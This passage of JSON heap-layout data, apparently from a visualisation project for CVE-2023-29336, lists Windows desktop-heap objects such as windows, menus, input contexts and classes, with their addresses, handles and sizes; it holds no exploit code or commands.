fa","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500618a30","Type":"INPUTCONTEXT","Handle":"0x101fb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061d250","Type":"WINDOW","Handle":"0x101fc","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500618fd0","Type":"INPUTCONTEXT","Handle":"0x101fd","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061d0e0","Type":"INPUTCONTEXT","Handle":"0x101fe","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061d3d0","Type":"WINDOW","Handle":"0x10200","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061d720","Type":"WINDOW","Handle":"0x10202","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061db80","Type":"INPUTCONTEXT","Handle":"0x20203","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061d890","Type":"WINDOW","Handle":"0x10204","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50060ef90","Type":"INPUTCONTEXT","Handle":"0x60205","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061da00","Type":"WINDOW","Handle":"0x10206","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061dbf0","Type":"WINDOW","Handle":"0x10208","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061dd70","Type":"WINDOW","Handle":"0x1020a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061def0","Type":"WINDOW","Handle":"0x1020c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061e100","Type":"WINDOW","Handle":"0x1020e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061e2a0","Type":"WINDOW","Handle":"0x10210","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500604a20","Type":"INPUTCONTEXT","Handle":"0x40211","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061e440","Type":"WINDOW","Handle":"0x10212","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061e620","Type":"WINDOW","Handle":"0x10214","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006213d0","Type":"MENU","Handle":"0x5021b","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d5006288c0","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d5006113a0","Type":"INPUTCONTEXT","Handle":"0x50225","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500622870","Type":"INPUTCONTEXT","Handle":"0x10242","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006228e0","Type":"INPUTCONTEXT","Handle":"0xa0244","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006230f0","Type":"INPUTCONTEXT","Handle":"0x30248","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500622bc0","Type":"WINDOW","Handle":"0x3024a","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500622d90","Type":"WINDOW","Handle":"0x3024c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500623160","Type":"INPUTCONTEXT","Handle":"0x1024e","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006231d0","Type":"INPUTCONTEXT","Handle":"0x20250","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500625230","Type":"WINDOW","Handle":"0x40252","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006234b0","Type":"WINDOW","Handle":"0x30254","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500623680","Type":"WINDOW","Handle":"0x10256","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500623ab0","Type":"WINDOW","Handle":"0x10258","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500623d70","Type":"WINDOW","Handle":"0x1025a","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500624010","Type":"WINDOW","Handle":"0x1025c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006242a0","Type":"WINDOW","Handle":"0x1025e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500624530","Type":"WINDOW","Handle":"0x10260","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500624cf0","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500625bd0","Type":"WINDOW","Handle":"0x20262","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500620d20","Type":"WINDOW","Handle":"0x50266","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006247a0","Type":"WINDOW","Handle":"0x1026c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500609c30","Type":"WINDOW","Handle":"0x70270","Size":25,"UnusedBytes":32},{"Block":"0xffffc8d500627e60","Type":"WINDOW:PROPLIST","Size":9,"UnusedBytes":8},{"Block":"0xffffc8d500626040","Type":"WINDOW","Handle":"0x40272","Size":24,"UnusedBytes":12},{"Block":"0xffffc8d500624940","Type":"WINDOW","Handle":"0x10274","Size":24,"UnusedBytes":8},{"Block":"0xffffc8d500602940","Type":"WINDOW","Handle":"0x2027c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500624d30","Type":"WINDOW","Handle":"0x1027e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500624ed0","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d50061be20","Type":"INPUTCONTEXT","Handle":"0x20280","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500624f10","Type":"INPUTCONTEXT","Handle":"0x10284","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006253c0","Type":"INPUTCONTEXT","Handle":"0x10286","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500625500","Type":"WINDOW","Handle":"0x10288","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006256b0","Type":"WINDOW","Handle":"0x1028a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500625940","Type":"WINDOW","Handle":"0x1028c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500626340","Type":"WINDOW","Handle":"0x6029c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500626960","Type":"WINDOW","Handle":"0x7029e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006264d0","Type":"WINDOW","Handle":"0x402a0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500626b40","Type":"WINDOW","Handle":"0x102aa","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500626d20","Type":"WINDOW","Handle":"0x102ac","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500626f00","Type":"WINDOW","Handle":"0x102ae","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500620960","Type":"WINDOW","Handle":"0x202b0","Size":24,"UnusedBytes":12},{"Block":"0xffffc8d5006214e0","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d500620f50","Type":"WINDOW","Handle":"0x102b2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500628300","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500627fa0","Type":"WINDOW","Handle":"0x102b4","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500628160","Type":"WINDOW","Handle":"0x202b6","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006297c0","Type":"WINDOW","Handle":"0x102b8","Size":24,"UnusedBytes":8},{"Block":"0xffffc8d500626af0","Type":"INPUTCONTEXT","Handle":"0x402b9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500626cd0","Type":"INPUTCONTEXT","Handle":"0x402bd","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50062a140","Type":"WINDOW","Handle":"0x102be","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500626eb0","Type":"INPUTCONTEXT","Handle":"0x102bf","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50062a480","Type":"WINDOW","Handle":"0x102c0","Size":37,"UnusedBytes":8},{"Block":"0xffffc8d500627090","Type":"INPUTCONTEXT","Handle":"0x102c3","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50062a920","Type":"WINDOW","Handle":"0x102c4","Size":37,"UnusedBytes":8},{"Block":"0xffffc8d500627370","Type":"INPUTCONTEXT","Handle":"0x202c7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500620cd0","Type":"INPUTCONTEXT","Handle":"0x5f02cb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061bf00","Type":"INPUTCONTEXT","Handle":"0x202cd","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500629c00","Type":"INPUTCONTEXT","Handle":"0x402e3","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500628360","Type":"INPUTCONTEXT","Handle":"0x102e7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006283b0","Type":"HOOK","Handle":"0x102e9","Size":8,"UnusedBytes":32},{"Block":"0xffffc8d500629960","Type":"INPUTCONTEXT","Handle":"0x102eb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500629b90","Type":"INPUTCONTEXT","Handle":"0x202ed","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50064f3e0","Type":"MENU","Handle":"0x104ab","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d50064fa80","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d50064f480","Type":"MENU","Handle":"0x104ad","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d50064f520","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d50062ab70","Type":"MENU","Handle":"0x104af","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d50064f270","Type":"WINDOW","Handle":"0x204ba","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500629ed0","Type":"WINDOW","Handle":"0x204bc","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50062bfa0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062c050","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062be00","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062beb0","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062bc60","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062bd10","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062bac0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062bb70","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b920","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b9d0","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b780","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b830","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b5e0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b690","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b440","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b4f0","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b2a0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b350","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b100","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b1b0","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062af80","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50064ff90","Type":"CLS:NAME","Size":3,"UnusedBytes":41},{"Block":"0xffffc8d50062ae20","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50064ff50","Type":"CLS:NAME","Size":2,"UnusedBytes":27},{"Block":"0xffffc8d50062acc0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d5006155b0","Type":"CLS:NAME","Size":2,"UnusedBytes":27},{"Block":"0xffffc8d500620570","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500629b50","Type":"CLS:NAME","Size":2,"UnusedBytes":27},{"Block":"0xffffc8d500620410","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500629b10","Type":"CLS:NAME","Size":2,"UnusedBytes":27},{"Block":"0xffffc8d5006299b0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500617120","Type":"CLS:NAME","Size":2,"UnusedBytes":27},{"Block":"0xffffc8d50062a040","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062a0f0","Type":"CLS:NAME","Size":3,"UnusedBytes":25},{"Block":"0xffffc8d50062a6d0","Type":"CLS","Size":37,"UnusedBytes":16},{"Block":"0xffffc8d50064f240","Type":"CLS:NAME","Size":3,"UnusedBytes":21},{"Block":"0xffffc8d50062a390","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062a440","Type":"CLS:NAME","Size":4,"UnusedBytes":23},{"Block":"0xffffc8d500629d20","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500629dd0","Type":"CLS:NAME","Size":3,"UnusedBytes":21},{"Block":"0xffffc8d50062a2e0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062a120","Type":"CLS:NAME","Size":2,"UnusedBytes":9},{"Block":"0xffffc8d500629e00","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500629eb0","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d500629c50","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500629d00","Type":"CLS:NAME","Size":2,"UnusedBytes":25}]},"Freed":[{"Block":"0xffffc8d50064ff70","Size":2},{"Block":"0xffffc8d500615590","Size":2},{"Block":"0xffffc8d500629b30","Size":2},{"Block":"0xffffc8d50064f9d0","Size":2},{"Block":"0xffffc8d5006155d0","Size":3},{"Block":"0xffffc8d50062aed0","Size":11},{"Block":"0xffffc8d50062ad70","Size":11},{"Block":"0xffffc8d50062ac10","Size":11},{"Block":"0xffffc8d5006204c0","Size":11},{"Block":"0xffffc8d500629a60","Size":11},{"Block":"0xffffc8d50062bed0","Size":13},{"Block":"0xffffc8d50062bd30","Size":13},{"Block":"0xffffc8d50062bb90","Size":13},{"Block":"0xffffc8d50062b9f0","Size":13},{"Block":"0xffffc8d50062b850","Size":13},{"Block":"0xffffc8d50062b6b0","Size":13},{"Block":"0xffffc8d50062b510","Size":13},{"Block":"0xffffc8d50062b370","Size":13},{"Block":"0xffffc8d50062b1d0","Size":13},{"Block":"0xffffc8d50062b030","Size":13},{"Block":"0xffffc8d50062c070","Size":8989}]} 2 | -------------------------------------------------------------------------------- /cve-2023-29336/visualisation/src/menu-created.memorylayout.json: -------------------------------------------------------------------------------- 1 | {"HeapFirstEntry":"0xffffc8d5006006f0","HeapLastValidEntry":"0xffffc8d501a00000","Granularity":16,"Allocated":{"Objects":[{"Block":"0xffffc8d500600810","Type":"WINDOW","Handle":"0x10010","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061e5c0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500600a50","Type":"WINDOW","Handle":"0x10012","Size":24,"UnusedBytes":20},{"Block":"0xffffc8d500600ca0","Type":"WINDOW","Handle":"0x10014","Size":26,"UnusedBytes":8},{"Block":"0xffffc8d50061f510","Type":"WINDOW","Handle":"0x40018","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006011d0","Type":"WINDOW","Handle":"0x1001c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006013c0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500601730","Type":"WINDOW","Handle":"0x2001e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006018e0","Type":"WINDOW","Handle":"0x10020","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061eaf0","Type":"WINDOW","Handle":"0x20026","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061ed50","Type":"WINDOW","Handle":"0x20028","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061f390","Type":"WINDOW","Handle":"0x20038","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006221f0","Type":"WINDOW","Handle":"0x4003a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061e850","Type":"WINDOW","Handle":"0x2003c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061fe00","Type":"WINDOW","Handle":"0x20040","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006226d0","Type":"WINDOW","Handle":"0x2004e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500622370","Type":"WINDOW","Handle":"0x30050","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500627850","Type":"WINDOW","Handle":"0x30052","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500621d70","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d50061eef0","Type":"WINDOW","Handle":"0x30054","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061f0b0","Type":"WINDOW","Handle":"0x20056","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006036b0","Type":"INPUTCONTEXT","Handle":"0x2006b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500620100","Type":"WINDOW","Handle":"0x5006c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006279d0","Type":"WINDOW","Handle":"0x3006e","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500627ce0","Type":"WINDOW","Handle":"0x30070","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500617ac0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d5006020b0","Type":"INPUTCONTEXT","Handle":"0x2007b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500601b70","Type":"INPUTCONTEXT","Handle":"0x2007f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500601b00","Type":"INPUTCONTEXT","Handle":"0x20081","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500601a90","Type":"INPUTCONTEXT","Handle":"0x20083","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500602040","Type":"INPUTCONTEXT","Handle":"0x100089","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500601e50","Type":"WINDOW","Handle":"0x40094","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500600f10","Type":"INPUTCONTEXT","Handle":"0x10095","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061ff80","Type":"WINDOW","Handle":"0x40096","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500602bf0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d5006022e0","Type":"INPUTCONTEXT","Handle":"0x80097","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006025d0","Type":"WINDOW","Handle":"0x20098","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500602100","Type":"WINDOW","Handle":"0x2009a","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500602d50","Type":"WINDOW","Handle":"0x1009c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500603000","Type":"WINDOW","Handle":"0x1009e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500603280","Type":"WINDOW","Handle":"0x100a0","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500621700","Type":"INPUTCONTEXT","Handle":"0x300a1","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500603520","Type":"WINDOW","Handle":"0x100a2","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500603810","Type":"WINDOW","Handle":"0x100a4","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500627b60","Type":"WINDOW","Handle":"0x300a6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061b1d0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500603d80","Type":"WINDOW","Handle":"0x100aa","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060f670","Type":"INPUTCONTEXT","Handle":"0x300ab","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500603f40","Type":"WINDOW","Handle":"0x100ac","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500603ac0","Type":"INPUTCONTEXT","Handle":"0x100ad","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500604350","Type":"WINDOW","Handle":"0x100ae","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006045c0","Type":"WINDOW","Handle":"0x100b0","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500604860","Type":"WINDOW","Handle":"0x100b2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500604d30","Type":"WINDOW","Handle":"0x200b4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500625d40","Type":"WINDOW:PROPLIST","Size":15,"UnusedBytes":8},{"Block":"0xffffc8d500604ed0","Type":"WINDOW","Handle":"0x100b6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500604ab0","Type":"INPUTCONTEXT","Handle":"0x100b7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500605130","Type":"WINDOW","Handle":"0x200b8","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500604b20","Type":"INPUTCONTEXT","Handle":"0x100b9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500605370","Type":"WINDOW","Handle":"0x100ba","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006050c0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d5006055c0","Type":"WINDOW","Handle":"0x100bc","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006092a0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500604c00","Type":"INPUTCONTEXT","Handle":"0x100bd","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500605820","Type":"WINDOW","Handle":"0x100be","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006059e0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500620690","Type":"INPUTCONTEXT","Handle":"0x1500bf","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500605b30","Type":"WINDOW","Handle":"0x100c0","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500609a50","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":24},{"Block":"0xffffc8d500605e40","Type":"WINDOW","Handle":"0x100c2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500606040","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500608180","Type":"INPUTCONTEXT","Handle":"0x200c3","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006061e0","Type":"WINDOW","Handle":"0x100c4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500606360","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500606440","Type":"WINDOW","Handle":"0x100c6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006065c0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500606640","Type":"WINDOW","Handle":"0x100c8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500608350","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":24},{"Block":"0xffffc8d5006067e0","Type":"WINDOW","Handle":"0x100ca","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006069a0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500609250","Type":"INPUTCONTEXT","Handle":"0x200cb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500606c90","Type":"WINDOW","Handle":"0x100cc","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060ab60","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":8},{"Block":"0xffffc8d500606e10","Type":"WINDOW","Handle":"0x100ce","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500607170","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500606ff0","Type":"WINDOW","Handle":"0x100d0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061d600","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500609ff0","Type":"INPUTCONTEXT","Handle":"0x200d1","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006071b0","Type":"WINDOW","Handle":"0x100d2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500606fb0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500607420","Type":"WINDOW","Handle":"0x100d4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006075a0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006075d0","Type":"WINDOW","Handle":"0x100d6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006098b0","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":8},{"Block":"0xffffc8d500607790","Type":"WINDOW","Handle":"0x100d8","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500611e10","Type":"INPUTCONTEXT","Handle":"0x300d9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500607980","Type":"WINDOW","Handle":"0x100da","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500609900","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":8},{"Block":"0xffffc8d50062bed0","Type":"MENU","Handle":"0x500db","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d50062c070","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d500607c30","Type":"WINDOW","Handle":"0x100dc","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061e280","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500607db0","Type":"WINDOW","Handle":"0x100de","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500609860","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":8},{"Block":"0xffffc8d50060ae20","Type":"INPUTCONTEXT","Handle":"0x100df","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500607fd0","Type":"WINDOW","Handle":"0x100e0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006097b0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006081d0","Type":"WINDOW","Handle":"0x100e2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500608390","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006083c0","Type":"WINDOW","Handle":"0x100e4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500609820","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500615320","Type":"INPUTCONTEXT","Handle":"0x400e5","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500608580","Type":"WINDOW","Handle":"0x100e6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061aac0","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d50060c980","Type":"INPUTCONTEXT","Handle":"0x300e7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500608750","Type":"WINDOW","Handle":"0x100e8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500608700","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d50060cb50","Type":"INPUTCONTEXT","Handle":"0x100e9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006088d0","Type":"WINDOW","Handle":"0x100ea","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500608a70","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500608aa0","Type":"WINDOW","Handle":"0x100ec","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500608a50","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500608d00","Type":"WINDOW","Handle":"0x100ee","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006090a0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500608eb0","Type":"WINDOW","Handle":"0x100f0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500609070","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006090d0","Type":"WINDOW","Handle":"0x100f2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006092d0","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500609310","Type":"WINDOW","Handle":"0x100f4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500607fa0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d50060e080","Type":"INPUTCONTEXT","Handle":"0x700f5","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500609490","Type":"WINDOW","Handle":"0x100f6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500607950","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d50060d0a0","Type":"INPUTCONTEXT","Handle":"0x100f7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500609610","Type":"WINDOW","Handle":"0x10